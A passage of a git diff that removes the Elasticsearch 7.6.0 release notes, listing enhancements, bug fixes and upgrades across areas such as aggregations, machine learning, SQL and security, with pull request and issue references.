track the progress of a search request locally {es-pull}49471[#49471] (issue: {es-issue}49091[#49091]) - - - -[[enhancement-7.6.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Add reusable HistogramValue object {es-pull}49799[#49799] (issue: {es-issue}49683[#49683]) -* Optimize composite aggregation based on index sorting {es-pull}48399[#48399] (issue: {es-issue}48130[#48130]) - -Allocation:: -* Auto-expand indices according to allocation filtering rules {es-pull}48974[#48974] -* Do not cancel ongoing recovery for noop copy on broken node {es-pull}48265[#48265] (issue: {es-issue}47974[#47974]) -* Quieter logging from the DiskThresholdMonitor {es-pull}48115[#48115] (issue: {es-issue}48038[#48038]) -* Faster access to INITIALIZING/RELOCATING shards {es-pull}47817[#47817] (issues: {es-issue}46941[#46941], {es-issue}48579[#48579]) - -Analysis:: -* Check for deprecations when analyzers are built {es-pull}50908[#50908] (issue: {es-issue}42349[#42349]) -* Make Multiplexer inherit filter chains analysis mode {es-pull}50662[#50662] (issue: {es-issue}50554[#50554]) -* Allow custom characters in token_chars of ngram tokenizers {es-pull}49250[#49250] (issue: {es-issue}25894[#25894]) - -Authentication:: -* Add Debug/Trace logging for authentication {es-pull}49575[#49575] (issue: {es-issue}49473[#49473]) - -Authorization:: -* Increase Size and lower TTL on DLS BitSet Cache {es-pull}50535[#50535] (issues: {es-issue}43669[#43669], {es-issue}49260[#49260]) -* Add 'monitor_snapshot' cluster privilege {es-pull}50489[#50489] (issue: {es-issue}50210[#50210]) -* Remove reserved roles for code search {es-pull}50068[#50068] (issue: {es-issue}49842[#49842]) -* [Code] Remove code_admin/code_user roles {es-pull}48164[#48164] -* Resolve the role query and the number of docs lazily {es-pull}48036[#48036] - -CCR:: -* Improve error message when pausing index {es-pull}48915[#48915] -* Use MultiFileTransfer in CCR remote recovery {es-pull}44514[#44514] (issue: {es-issue}44468[#44468]) - -CRUD:: -* print id detail when id is too long. {es-pull}49433[#49433] -* Add preflight check to dynamic mapping updates {es-pull}48817[#48817] (issue: {es-issue}35564[#35564]) - -Cluster Coordination:: -* Move metadata storage to Lucene {es-pull}50907[#50907] (issue: {es-issue}48701[#48701]) -* Remove custom metadata tool {es-pull}50813[#50813] (issue: {es-issue}48701[#48701]) - -Distributed:: -* Use retention lease in peer recovery of closed indices {es-pull}48430[#48430] (issue: {es-issue}45136[#45136]) - -Engine:: -* Do not force refresh when write indexing buffer {es-pull}50769[#50769] -* Deleted docs disregarded for if_seq_no check {es-pull}50526[#50526] -* Allow realtime get to read from translog {es-pull}48843[#48843] -* Do not warm up searcher in engine constructor {es-pull}48605[#48605] (issue: {es-issue}47186[#47186]) -* Add a new merge policy that interleaves old and new segments on force merge {es-pull}48533[#48533] (issue: {es-issue}37043[#37043]) -* Refresh should not acquire readLock {es-pull}48414[#48414] (issue: {es-issue}47186[#47186]) - -Features/ILM+SLM:: -* Refresh cached phase policy definition if possible on new poli… {es-pull}50820[#50820] (issue: {es-issue}48431[#48431]) -* Make the UpdateRolloverLifecycleDateStep retryable {es-pull}50702[#50702] (issue: {es-issue}48183[#48183]) -* Make InitializePolicyContextStep retryable {es-pull}50685[#50685] (issue: {es-issue}48183[#48183]) -* ILM retryable async action steps {es-pull}50522[#50522] (issues: {es-issue}44135[#44135], {es-issue}48183[#48183]) -* Make the TransportRolloverAction execute in one cluster state update {es-pull}50388[#50388] -* ILM open/close steps are noop if idx is open/close {es-pull}48614[#48614] -* ILM Make the `check-rollover-ready` step retryable {es-pull}48256[#48256] (issue: {es-issue}44135[#44135]) - -Features/Ingest:: -* Foreach processor - fork recursive call {es-pull}50514[#50514] -* Sync grok patterns with logstash patterns {es-pull}50381[#50381] -* Replace required pipeline with final pipeline {es-pull}49470[#49470] (issue: {es-issue}49247[#49247]) -* Add templating support to enrich processor {es-pull}49093[#49093] -* Introduce on_failure_pipeline ingest metadata inside on_failure block {es-pull}49076[#49076] (issue: {es-issue}44920[#44920]) -* Add templating support to pipeline processor. {es-pull}49030[#49030] (issue: {es-issue}39955[#39955]) -* Add option to split processor for preserving trailing empty fields {es-pull}48664[#48664] (issue: {es-issue}48498[#48498]) -* Change grok watch dog to be Matcher based instead of thread based. {es-pull}48346[#48346] (issues: {es-issue}43673[#43673], {es-issue}47374[#47374]) -* update ingest-user-agent regexes.yml {es-pull}47807[#47807] - -Features/Java High Level REST Client:: -* Add remote info to the HLRC {es-pull}49657[#49657] (issue: {es-issue}47678[#47678]) -* Add delete alias to the HLRC {es-pull}48819[#48819] (issue: {es-issue}47678[#47678]) - -Features/Monitoring:: -* Significantly Lower Monitoring HttpExport Memory Footprint {es-pull}48854[#48854] -* Validate proxy base path at parse time {es-pull}47912[#47912] (issue: {es-issue}47711[#47711]) -* Validate index name time format setting at parse time {es-pull}47911[#47911] (issue: {es-issue}47711[#47711]) -* Validate monitoring header overrides at parse time {es-pull}47848[#47848] (issue: {es-issue}47711[#47711]) -* Validate monitoring username at parse time {es-pull}47821[#47821] (issue: {es-issue}47711[#47711]) -* Validate monitoring password at parse time {es-pull}47740[#47740] (issue: {es-issue}47711[#47711]) - -Features/Stats:: -* Add ingest info to Cluster Stats {es-pull}48485[#48485] (issue: {es-issue}46146[#46146]) - -Features/Watcher:: -* Log attachment generation failures {es-pull}50080[#50080] -* Don't dump a stacktrace for invalid patterns when executing elasticse… {es-pull}49744[#49744] (issue: {es-issue}49642[#49642]) - -Geo:: -* "CONTAINS" support for BKD-backed geo_shape and shape fields {es-pull}50141[#50141] (issue: {es-issue}41204[#41204]) -* Adds support for geo-bounds filtering in geogrid aggregations {es-pull}50002[#50002] -* Introduce faster approximate sinh/atan math functions {es-pull}49009[#49009] (issue: {es-issue}41166[#41166]) -* Add IndexOrDocValuesQuery to GeoPolygonQueryBuilder {es-pull}48449[#48449] - -Infra/Core:: -* Add "did you mean" to ObjectParser {es-pull}50938[#50938] -* Consistent case in CLI option descriptions {es-pull}49635[#49635] -* Improve resiliency to formatting JSON in server {es-pull}48553[#48553] (issue: {es-issue}48450[#48450]) -* Don't close stderr under `--quiet` {es-pull}47208[#47208] (issue: {es-issue}46900[#46900]) - -Infra/Packaging:: -* Respect ES_PATH_CONF on package install {es-pull}50158[#50158] -* Restrict support for CMS to pre-JDK 14 {es-pull}49123[#49123] (issue: {es-issue}46973[#46973]) -* Remove parsed JVM settings from general settings in Windows service daemon manager {es-pull}49061[#49061] (issue: {es-issue}48796[#48796]) -* Package the JDK into jdk.app on macOS {es-pull}48765[#48765] -* Add UBI-based Docker images {es-pull}48710[#48710] (issue: {es-issue}48429[#48429]) - -Infra/Plugins:: -* Report progress of multiple plugin installs {es-pull}51001[#51001] (issue: {es-issue}50924[#50924]) -* Allow installing multiple plugins as a transaction {es-pull}50924[#50924] (issue: {es-issue}50443[#50443]) - -Infra/Scripting:: -* Scripting: ScriptFactory not required by compile {es-pull}50344[#50344] (issue: {es-issue}49466[#49466]) -* Scripting: Cache script results if deterministic {es-pull}50106[#50106] (issue: {es-issue}49466[#49466]) -* Scripting: Groundwork for caching script results {es-pull}49895[#49895] (issue: {es-issue}49466[#49466]) -* Scripting: add available languages & contexts API {es-pull}49652[#49652] (issue: {es-issue}49463[#49463]) -* Scripting: fill in get contexts REST API {es-pull}48319[#48319] (issue: {es-issue}47411[#47411]) -* Scripting: get context names REST API {es-pull}48026[#48026] (issue: {es-issue}47411[#47411]) - -Infra/Settings:: -* Add parameter to make sure that log of updating IndexSetting be more detailed {es-pull}49969[#49969] (issue: {es-issue}49818[#49818]) -* Enable dependent settings values to be validated {es-pull}49942[#49942] -* Do not reference values for filtered settings {es-pull}48066[#48066] - -License:: -* Add max_resource_units to enterprise license {es-pull}50735[#50735] -* Add setting to restrict license types {es-pull}49418[#49418] (issue: {es-issue}48508[#48508]) -* Support "enterprise" license types {es-pull}49223[#49223] (issue: {es-issue}48510[#48510]) - -Machine Learning:: -* Add audit warning for 1000 categories found early in job {es-pull}51146[#51146] (issue: {es-issue}50749[#50749]) -* Add `num_top_feature_importance_values` param to regression and classification {es-pull}50914[#50914] -* Implement force deleting a data frame analytics job {es-pull}50553[#50553] (issue: {es-issue}48124[#48124]) -* Delete unused data frame analytics state {es-pull}50243[#50243] -* Make each analysis report desired field mappings to be copied {es-pull}50219[#50219] (issue: {es-issue}50119[#50119]) -* Retry bulk indexing of state docs {es-pull}50149[#50149] (issue: {es-issue}50143[#50143]) -* Persist/restore state for data frame analytics classification {es-pull}50040[#50040] -* Introduce `randomize_seed` setting for regression and classification {es-pull}49990[#49990] -* Pass `prediction_field_type` to C++ analytics process {es-pull}49861[#49861] (issue: {es-issue}49796[#49796]) -* Add optional source filtering during data frame reindexing {es-pull}49690[#49690] (issue: {es-issue}49531[#49531]) -* Add default categorization analyzer definition to ML info {es-pull}49545[#49545] -* Add graceful retry for anomaly detector result indexing failures {es-pull}49508[#49508] (issue: {es-issue}45711[#45711]) -* Lower minimum model memory limit value for data frame analytics jobs from 1MB to 1kB {es-pull}49227[#49227] (issue: {es-issue}49168[#49168]) -* Improve `model_memory_limit` user experience for data frame analytics jobs {es-pull}44699[#44699] -* Improve performance of boosted tree training for both classification and regression {ml-pull}775[#775] -* Reduce the peak memory used by boosted tree training and fix an overcounting bug -estimating maximum memory usage {ml-pull}781[#781] -* Stratified fractional cross validation for regression {ml-pull}784[#784] -* Added `geo_point` supported output for `lat_long` function records {ml-pull}809[#809], {es-pull}47050[#47050] -* Use a random bag of the data to compute the loss function derivatives for each -new tree which is trained for both regression and classification {ml-pull}811[#811] -* Emit `prediction_probability` field alongside prediction field in ml results {ml-pull}818[#818] -* Reduce memory usage of {ml} native processes on Windows {ml-pull}844[#844] -* Reduce runtime of classification and regression {ml-pull}863[#863] -* Stop early training a classification and regression forest when the validation -error is no longer decreasing {ml-pull}875[#875] -* Emit `prediction_field_name` in data frame analytics results using the type -provided as `prediction_field_type` parameter {ml-pull}877[#877] -* Improve performance updating quantile estimates {ml-pull}881[#881] -* Migrate to use Bayesian optimisation for initial hyperparameter value line -searches and stop early if the expected improvement is too small {ml-pull}903[#903] -* Stop cross-validation early if the predicted test loss has a small chance of -being smaller than for the best parameter values found so far {ml-pull}915[#915] -* Optimize decision threshold for classification to maximize minimum class recall {ml-pull}926[#926] -* Include categorization memory usage in the `model_bytes` field in -`model_size_stats`, so that it is taken into account in node assignment -decisions {ml-pull}927[#927] (issue: {ml-issue}724[#724]) - -Mapping:: -* Add telemetry for flattened fields. {es-pull}48972[#48972] - -Network:: -* Add certutil http command {es-pull}49827[#49827] -* Do not load SSLService in plugin contructor {es-pull}49667[#49667] (issue: {es-issue}44536[#44536]) -* Netty4: switch to composite cumulator {es-pull}49478[#49478] -* Add the simple strategy to cluster settings {es-pull}49414[#49414] (issue: {es-issue}49067[#49067]) -* Deprecate misconfigured SSL server config {es-pull}49280[#49280] (issue: {es-issue}45892[#45892]) -* Improved diagnostics for TLS trust failures {es-pull}48911[#48911] - -Percolator:: -* Refactor percolator's QueryAnalyzer to use QueryVisitors {es-pull}49238[#49238] (issue: {es-issue}45639[#45639]) - -Ranking:: -* Support `search_type` in Rank Evaluation API {es-pull}48542[#48542] (issue: {es-issue}48503[#48503]) - -Recovery:: -* Use peer recovery retention leases for indices without soft-deletes {es-pull}50351[#50351] (issues: {es-issue}45136[#45136], {es-issue}46959[#46959]) -* Recovery buffer size 16B smaller {es-pull}50100[#50100] - -Reindex:: -* Reindex sort deprecation warning take 2 {es-pull}49855[#49855] (issue: {es-issue}49458[#49458]) - -SQL:: -* SQL: Handle uberjar scenario where the ES jdbc driver file is bundled in another jar {es-pull}51856[#51856] (issue: {es-issue}50201[#50201]) -* SQL: add trace logging for search responses coming from server {es-pull}50530[#50530] -* SQL: Add TRUNC alias for TRUNCATE {es-pull}49571[#49571] (issue: {es-issue}41195[#41195]) -* SQL: binary communication implementation for drivers and the CLI {es-pull}48261[#48261] (issue: {es-issue}47785[#47785]) -* SQL: Verify Full-Text Search functions not allowed in SELECT {es-pull}51568[#51568] (issue: {es-issue}47446[#47446]) - - -Search:: -* Add Validation for maxQueryTerms to be greater than 0 for MoreLikeThisQuery {es-pull}49966[#49966] (issue: {es-issue}49927[#49927]) -* Optimize numeric sort on match_all queries {es-pull}49717[#49717] (issue: {es-issue}48804[#48804]) -* Pre-sort shards based on the max/min value of the primary sort field {es-pull}49092[#49092] (issue: {es-issue}49091[#49091]) -* Optimize sort on long field {es-pull}48804[#48804] -* Search optimisation - add canMatch early aborts for queries on "_index" field {es-pull}48681[#48681] (issue: {es-issue}48473[#48473]) -* #48475 Pure disjunctions should rewrite to a MatchNoneQueryBuilder {es-pull}48557[#48557] -* Disable caching when queries are profiled {es-pull}48195[#48195] (issue: {es-issue}33298[#33298]) -* BlendedTermQuery's equals method should consider boosts {es-pull}48193[#48193] (issue: {es-issue}48184[#48184]) -* Increase the number of vector dims to 2048 {es-pull}46895[#46895] - -Security:: -* Make .async-search-* a restricted namespace {es-pull}50294[#50294] -* Security should not reload files that haven't changed {es-pull}50207[#50207] (issue: {es-issue}50063[#50063]) - -Snapshot/Restore:: -* Use Cluster State to Track Repository Generation {es-pull}49729[#49729] (issue: {es-issue}49060[#49060]) -* Track Repository Gen. in BlobStoreRepository {es-pull}48944[#48944] (issues: {es-issue}38941[#38941], {es-issue}47520[#47520], {es-issue}47834[#47834], {es-issue}49048[#49048]) -* Restore from Individual Shard Snapshot Files in Parallel {es-pull}48110[#48110] (issue: {es-issue}42791[#42791]) -* Track Shard-Snapshot Index Generation at Repository Root {es-pull}46250[#46250] (issues: {es-issue}38941[#38941], {es-issue}45736[#45736]) - -Store:: -* mmap dim files in HybridDirectory {es-pull}49272[#49272] (issue: {es-issue}48509[#48509]) - -Transform:: -* Improve force stop robustness in case of an error {es-pull}51072[#51072] -* Add actual timeout in message {es-pull}50140[#50140] -* Automatic deletion of old checkpoints {es-pull}49496[#49496] -* Improve error handling of script errors {es-pull}48887[#48887] (issue: {es-issue}48467[#48467]) -* Add `wait_for_checkpoint` flag to stop {es-pull}47935[#47935] (issue: {es-issue}45293[#45293]) - - - -[[bug-7.6.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Use #name() instead of #simpleName() when generating doc values {es-pull}51920[#51920] (issues: {es-issue}50307[#50307], {es-issue}51847[#51847]) -* Fix a sneaky bug in rare_terms {es-pull}51868[#51868] (issue: {es-issue}51020[#51020]) -* Support time_zone on composite's date_histogram {es-pull}51172[#51172] (issues: {es-issue}45199[#45199], {es-issue}45200[#45200]) -* Fix format problem in composite of unmapped {es-pull}50869[#50869] (issue: {es-issue}50600[#50600]) -* SingleBucket aggs need to reduce their bucket's pipelines first {es-pull}50103[#50103] (issue: {es-issue}50054[#50054]) -* Avoid precision loss in DocValueFormat.RAW#parseLong {es-pull}49063[#49063] (issue: {es-issue}38692[#38692]) -* Fix ignoring missing values in min/max aggregations {es-pull}48970[#48970] (issue: {es-issue}48905[#48905]) - -Allocation:: -* Collect shard sizes for closed indices {es-pull}50645[#50645] (issue: {es-issue}33888[#33888]) -* Auto-expand replicated closed indices {es-pull}48973[#48973] -* Ignore dangling indices created in newer versions {es-pull}48652[#48652] (issue: {es-issue}34264[#34264]) -* Handle negative free disk space in deciders {es-pull}48392[#48392] (issue: {es-issue}48380[#48380]) - -Analysis:: -* Fix caching for PreConfiguredTokenFilter {es-pull}50912[#50912] (issue: {es-issue}50734[#50734]) -* Throw Error on deprecated nGram and edgeNGram custom filters {es-pull}50376[#50376] (issue: {es-issue}50360[#50360]) -* _analyze api does not correctly use normalizers when specified {es-pull}48866[#48866] (issue: {es-issue}48650[#48650]) - -Audit:: -* Audit log filter and marker {es-pull}45456[#45456] (issue: {es-issue}47251[#47251]) - -Authentication:: -* Preserve ApiKey credentials for async verification {es-pull}51244[#51244] -* Don't fallback to anonymous for tokens/apikeys {es-pull}51042[#51042] (issue: {es-issue}50171[#50171]) -* Populate User metadata with OpenIDConnect collections {es-pull}50521[#50521] (issue: {es-issue}50250[#50250]) -* Always return 401 for not valid tokens {es-pull}49736[#49736] (issue: {es-issue}38866[#38866]) -* Fix iterate-from-1 bug in smart realm order {es-pull}49473[#49473] -* Remove unnecessary details logged for OIDC {es-pull}48746[#48746] -* Add owner flag parameter to the rest spec {es-pull}48500[#48500] (issue: {es-issue}48499[#48499]) - -Authorization:: -* Fix memory leak in DLS bitset cache {es-pull}50635[#50635] (issue: {es-issue}49261[#49261]) -* Validate field permissions when creating a role {es-pull}50212[#50212] (issues: {es-issue}46275[#46275], {es-issue}48108[#48108]) -* Validate field permissions when creating a role {es-pull}48108[#48108] (issue: {es-issue}46275[#46275]) - -CCR:: -* CCR should auto-retry rejected execution exceptions {es-pull}49213[#49213] - -CRUD:: -* Block too many concurrent mapping updates {es-pull}51038[#51038] (issue: {es-issue}50670[#50670]) -* Ensure meta and document field maps are never null in GetResult {es-pull}50112[#50112] (issue: {es-issue}48215[#48215]) -* Replicate write actions before fsyncing them {es-pull}49746[#49746] -* Do not mutate request on scripted upsert {es-pull}49578[#49578] (issue: {es-issue}48670[#48670]) -* Fix Transport Stopped Exception {es-pull}48930[#48930] (issue: {es-issue}42612[#42612]) -* Return consistent source in updates {es-pull}48707[#48707] -* Close query cache on index service creation failure {es-pull}48230[#48230] (issue: {es-issue}48186[#48186]) - -Cluster Coordination:: -* Import replicated closed dangling indices {es-pull}50649[#50649] -* Ignore metadata of deleted indices at start {es-pull}48918[#48918] -* Make elasticsearch-node tools custom metadata-aware {es-pull}48390[#48390] - -Discovery-Plugins:: -* Make EC2 Discovery Cache Empty Seed Hosts List {es-pull}50607[#50607] (issue: {es-issue}50550[#50550]) -* Make EC2 Discovery Plugin Retry Requests {es-pull}50550[#50550] (issue: {es-issue}50462[#50462]) - -Distributed:: -* Exclude nested documents in LuceneChangesSnapshot {es-pull}51279[#51279] -* Closed shard should never open new engine {es-pull}47186[#47186] (issues: {es-issue}45263[#45263], {es-issue}47060[#47060]) -* Fix meta version of task index mapping {es-pull}50363[#50363] (issue: {es-issue}48393[#48393]) - -Engine:: -* Do not wrap soft-deletes reader for segment stats {es-pull}51331[#51331] (issues: {es-issue}51192[#51192], {es-issue}51303[#51303]) -* Account soft-deletes in FrozenEngine {es-pull}51192[#51192] (issue: {es-issue}50775[#50775]) -* Account trimAboveSeqNo in committed translog generation {es-pull}50205[#50205] (issue: {es-issue}49970[#49970]) -* Greedily advance safe commit on new global checkpoint {es-pull}48559[#48559] (issue: {es-issue}48532[#48532]) -* Do not ignore exception when trim unreferenced readers {es-pull}48470[#48470] - -Features/Features:: -* Fix X-Pack SchedulerEngine Shutdown {es-pull}48951[#48951] - -Features/ILM+SLM:: -* Fix SLM check for restore in progress {es-pull}50868[#50868] -* Handle failure to retrieve ILM policy step better {es-pull}49193[#49193] (issue: {es-issue}49128[#49128]) -* Don't halt policy execution on policy trigger exception {es-pull}49128[#49128] -* Re-read policy phase JSON when using ILM's move-to-step API {es-pull}48827[#48827] -* Don't schedule SLM jobs when services have been stopped {es-pull}48658[#48658] (issue: {es-issue}47749[#47749]) -* Ensure SLM stats does not block an in-place upgrade from 7.4 {es-pull}48367[#48367] -* Ensure SLM stats does not block an in-place upgrade from 7.4 {es-pull}48361[#48361] -* Add SLM support to xpack usage and info APIs {es-pull}48096[#48096] (issue: {es-issue}43663[#43663]) -* Change policy_id to list type in slm.get_lifecycle {es-pull}47766[#47766] (issue: {es-issue}47765[#47765]) - -Features/Ingest:: -* Fix ignore_missing in CsvProcessor {es-pull}51600[#51600] -* Don't overwrite target field with SetSecurityUserProcessor {es-pull}51454[#51454] (issue: {es-issue}51428[#51428]) -* Fix ingest simulate response document order if processor executes async {es-pull}50244[#50244] -* Allow list of IPs in geoip ingest processor {es-pull}49573[#49573] (issue: {es-issue}46193[#46193]) -* Do not wrap ingest processor exception with IAE {es-pull}48816[#48816] (issue: {es-issue}48810[#48810]) -* Introduce dedicated ingest processor exception {es-pull}48810[#48810] (issue: {es-issue}48803[#48803]) - -Features/Java High Level REST Client:: -* Support es7 node http publish_address format {es-pull}49279[#49279] (issue: {es-issue}48950[#48950]) -* Add slices to delete and update by query in HLRC {es-pull}48420[#48420] -* fix incorrect comparison {es-pull}48208[#48208] -* Fix HLRC parsing of CancelTasks response {es-pull}47017[#47017] -* Prevent deadlock by using separate schedulers {es-pull}48697[#48697] (issues: {es-issue}41451[#41451], {es-issue}47599[#47599]) - -Features/Java Low Level REST Client:: -* Improve warning value extraction performance in Response {es-pull}50208[#50208] (issue: {es-issue}24114[#24114]) - -Features/Monitoring:: -* Validate exporter type is HTTP for HTTP exporter {es-pull}49992[#49992] (issues: {es-issue}47246[#47246], {es-issue}47711[#47711], {es-issue}49942[#49942]) -* APM system_user {es-pull}47668[#47668] (issues: {es-issue}2708[#2708], {es-issue}40876[#40876]) - -Geo:: -* Guard against null geoBoundingBox {es-pull}50506[#50506] (issue: {es-issue}50505[#50505]) -* Geo: Switch generated GeoJson type names to camel case (#50285) {es-pull}50400[#50400] (issue: {es-issue}49568[#49568]) -* Geo: Switch generated WKT to upper case {es-pull}50285[#50285] (issue: {es-issue}49568[#49568]) -* Fix typo when assigning null_value in GeoPointFieldMapper {es-pull}49645[#49645] -* Fix handling of circles in legacy geo_shape queries {es-pull}49410[#49410] (issue: {es-issue}49296[#49296]) -* GEO: intersects search for geo_shape return wrong result {es-pull}49017[#49017] -* Geo: improve handling of out of bounds points in linestrings {es-pull}47939[#47939] (issue: {es-issue}43916[#43916]) - -Highlighting:: -* Fix invalid break iterator highlighting on keyword field {es-pull}49566[#49566] - -Infra/Core:: -* Ignore virtual ethernet devices that disappear {es-pull}51581[#51581] (issue: {es-issue}49914[#49914]) -* Guess root cause support unwrap {es-pull}50525[#50525] (issue: {es-issue}50417[#50417]) -* Allow parsing timezone without fully provided time {es-pull}50178[#50178] (issue: {es-issue}49351[#49351]) -* [Java.time] Retain prefixed date pattern in formatter {es-pull}48703[#48703] (issue: {es-issue}48698[#48698]) -* Don't drop user's MaxDirectMemorySize flag on jdk8/windows {es-pull}48657[#48657] (issues: {es-issue}44174[#44174], {es-issue}48365[#48365]) -* Warn when MaxDirectMemorySize may be incorrect (Windows/JDK8 only issue) {es-pull}48365[#48365] (issue: {es-issue}47384[#47384]) -* [Java.time] Calculate week of a year with ISO rules {es-pull}48209[#48209] (issues: {es-issue}41670[#41670], {es-issue}42588[#42588], {es-issue}43275[#43275], {es-issue}43652[#43652]) - -Infra/Logging:: -* Slow log must use separate underlying logger for each index {es-pull}47234[#47234] (issue: {es-issue}42432[#42432]) - -Infra/Packaging:: -* Extend systemd timeout during startup {es-pull}49784[#49784] (issue: {es-issue}49593[#49593]) - -Infra/REST API:: -* Return 400 when handling invalid JSON {es-pull}49552[#49552] (issue: {es-issue}49428[#49428]) -* Slash missed in indices.put_mapping url {es-pull}49468[#49468] - -Machine Learning:: -* Fix 2 digit year regex in find_file_structure {es-pull}51469[#51469] -* Validate classification `dependent_variable` cardinality is at least two {es-pull}51232[#51232] -* Do not copy mapping from dependent variable to prediction field in regression analysis {es-pull}51227[#51227] -* Handle nested and aliased fields correctly when copying mapping {es-pull}50918[#50918] (issue: {es-issue}50787[#50787]) -* Fix off-by-one error in `ml_classic` tokenizer end offset {es-pull}50655[#50655] -* Improve uniqueness of result document IDs {es-pull}50644[#50644] (issue: {es-issue}50613[#50613]) -* Fix accuracy metric in multi-class confusion matrix {es-pull}50310[#50310] (issue: {es-issue}48759[#48759]) -* Fix race condition when stopping a data frame analytics jobs immediately after starting it {es-pull}50276[#50276] (issues: {es-issue}49680[#49680], {es-issue}50177[#50177]) -* Apply source query on data frame analytics memory estimation {es-pull}49517[#49517] (issue: {es-issue}49454[#49454]) -* Fix r_squared eval when variance is 0 {es-pull}49439[#49439] -* Blacklist a number of prediction field names {es-pull}49371[#49371] (issue: {es-issue}48808[#48808]) -* Make data frame analytics more robust for very short-lived analyses {es-pull}49282[#49282] (issue: {es-issue}49095[#49095]) -* Fixes potential memory corruption when determining seasonality {ml-pull}852[#852] -* Prevent `prediction_field_name` clashing with other fields in {ml} results {ml-pull}861[#861] -* Include out-of-order as well as in-order terms in categorization reverse searches {ml-pull}950[#950] (issue: {ml-issue}949[#949]) - -Mapping:: -* Ensure that field collapsing works with field aliases. {es-pull}50722[#50722] (issues: {es-issue}32648[#32648], {es-issue}50121[#50121]) -* Improve DateFieldMapper `ignore_malformed` handling {es-pull}50090[#50090] (issues: {es-issue}46675[#46675], {es-issue}50081[#50081]) -* Annotated text type should extend TextFieldType {es-pull}49555[#49555] (issue: {es-issue}49289[#49289]) -* Ensure parameters are updated when merging flattened mappings. {es-pull}48971[#48971] (issue: {es-issue}48907[#48907]) - -Network:: -* Fix TransportMasterNodeAction not Retrying NodeClosedException {es-pull}51325[#51325] - -Percolator:: -* Correctly handle MSM for nested disjunctions {es-pull}50669[#50669] (issue: {es-issue}50305[#50305]) -* Fix query analyzer logic for mixed conjunctions of terms and ranges {es-pull}49803[#49803] (issue: {es-issue}49684[#49684]) - -Recovery:: -* Check allocation id when failing shard on recovery {es-pull}50656[#50656] (issue: {es-issue}50508[#50508]) -* Migrate peer recovery from translog to retention lease {es-pull}49448[#49448] (issue: {es-issue}45136[#45136]) -* Ignore Lucene index in peer recovery if translog corrupted {es-pull}49114[#49114] - -Reindex:: -* Reindex and friends fail on RED shards {es-pull}45830[#45830] (issues: {es-issue}42612[#42612], {es-issue}45739[#45739]) - -SQL:: -* SQL: Fix milliseconds handling in intervals {es-pull}51675[#51675] (issue: {es-issue}41635[#41635]) -* SQL: Fix ORDER BY YEAR() function {es-pull}51562[#51562] (issue: {es-issue}51224[#51224]) -* SQL: change the way unsupported data types fields are handled {es-pull}50823[#50823] -* SQL: Optimisation fixes for conjunction merges {es-pull}50703[#50703] (issue: {es-issue}49637[#49637]) -* SQL: Fix issue with CAST and NULL checking. {es-pull}50371[#50371] (issue: {es-issue}50191[#50191]) -* SQL: fix NPE for JdbcResultSet.getDate(param, Calendar) calls {es-pull}50184[#50184] (issue: {es-issue}50174[#50174]) -* SQL: COUNT DISTINCT returns 0 instead of NULL for no matching docs {es-pull}50037[#50037] (issue: {es-issue}50013[#50013]) -* Fix LOCATE function optional parameter handling {es-pull}49666[#49666] (issue: {es-issue}49557[#49557]) -* Fix NULL handling for FLOOR and CEIL functions {es-pull}49644[#49644] (issue: {es-issue}49556[#49556]) -* Handle NULL arithmetic operations with INTERVALs {es-pull}49633[#49633] (issue: {es-issue}49297[#49297]) -* Fix issue with GROUP BY YEAR() {es-pull}49559[#49559] (issue: {es-issue}49386[#49386]) -* Fix issue with CASE/IIF pre-calculating results {es-pull}49553[#49553] (issue: {es-issue}49388[#49388]) -* Fix issue with folding of CASE/IIF {es-pull}49449[#49449] (issue: {es-issue}49387[#49387]) -* Fix issues with WEEK/ISO_WEEK/DATEDIFF {es-pull}49405[#49405] (issues: {es-issue}48209[#48209], {es-issue}49376[#49376]) -* SQL: Fix issue with mins & hours for DATEDIFF {es-pull}49252[#49252] -* SQL: Failing Group By queries due to different ExpressionIds {es-pull}43072[#43072] (issues: {es-issue}33361[#33361], {es-issue}34543[#34543], {es-issue}36074[#36074], {es-issue}37044[#37044], {es-issue}40001[#40001], {es-issue}40240[#40240], {es-issue}41159[#41159], {es-issue}42041[#42041], {es-issue}46316[#46316]) - -Search:: -* Fix upgrade of custom similarity {es-pull}50851[#50851] (issue: {es-issue}50763[#50763]) -* Fix NPE bug inner_hits {es-pull}50709[#50709] (issue: {es-issue}50539[#50539]) -* Collect results in a local list when notifying partial results {es-pull}49828[#49828] (issue: {es-issue}49778[#49778]) -* Fixes a bug in interval filter serialization {es-pull}49793[#49793] (issue: {es-issue}49519[#49519]) -* Correctly handle duplicates in unordered interval matching {es-pull}49775[#49775] -* Correct rewritting of script_score query {es-pull}48425[#48425] (issue: {es-issue}48081[#48081]) -* Do not throw errors on unknown types in SearchAfterBuilder {es-pull}48147[#48147] (issue: {es-issue}48074[#48074]) - -Security:: -* Always consume the body in has privileges {es-pull}50298[#50298] (issue: {es-issue}50288[#50288]) - -Snapshot/Restore:: -* Fix Overly Aggressive Request DeDuplication {es-pull}51270[#51270] (issue: {es-issue}51253[#51253]) -* Guard Repository#getRepositoryData for exception throw {es-pull}50970[#50970] -* Fix Index Deletion During Partial Snapshot Create {es-pull}50234[#50234] (issues: {es-issue}50200[#50200], {es-issue}50202[#50202]) -* Fix Index Deletion during Snapshot Finalization {es-pull}50202[#50202] (issues: {es-issue}45689[#45689], {es-issue}50200[#50200]) -* Fix RepoCleanup not Removed on Master-Failover {es-pull}49217[#49217] -* Make FsBlobContainer Listing Resilient to Concurrent Modifications {es-pull}49142[#49142] (issue: {es-issue}37581[#37581]) -* Fix SnapshotShardStatus Reporting for Failed Shard {es-pull}48556[#48556] (issue: {es-issue}48526[#48526]) -* Cleanup Concurrent RepositoryData Loading {es-pull}48329[#48329] (issue: {es-issue}48122[#48122]) - -Transform:: -* Fix mapping deduction for scaled_float {es-pull}51990[#51990] (issue: {es-issue}51780[#51780]) -* Fix stats can return old state information if security is enabled {es-pull}51732[#51732] (issue: {es-issue}51728[#51728]) -* Fail to start/put on missing pipeline {es-pull}50701[#50701] (issue: {es-issue}50135[#50135]) -* Fix possible audit logging disappearance after rolling upgrade {es-pull}49731[#49731] (issue: {es-issue}49730[#49730]) -* Do not fail checkpoint creation due to global checkpoint mismatch {es-pull}48423[#48423] (issue: {es-issue}48379[#48379]) - - - -[[upgrade-7.6.0]] -[discrete] -=== Upgrades - -Engine:: -* Upgrade to Lucene 8.4.0. {es-pull}50518[#50518] - -Infra/Packaging:: -* Upgrade the bundled JDK to JDK 13.0.2 {es-pull}51511[#51511] diff --git a/docs/reference/release-notes/7.7.asciidoc b/docs/reference/release-notes/7.7.asciidoc deleted file mode 100644 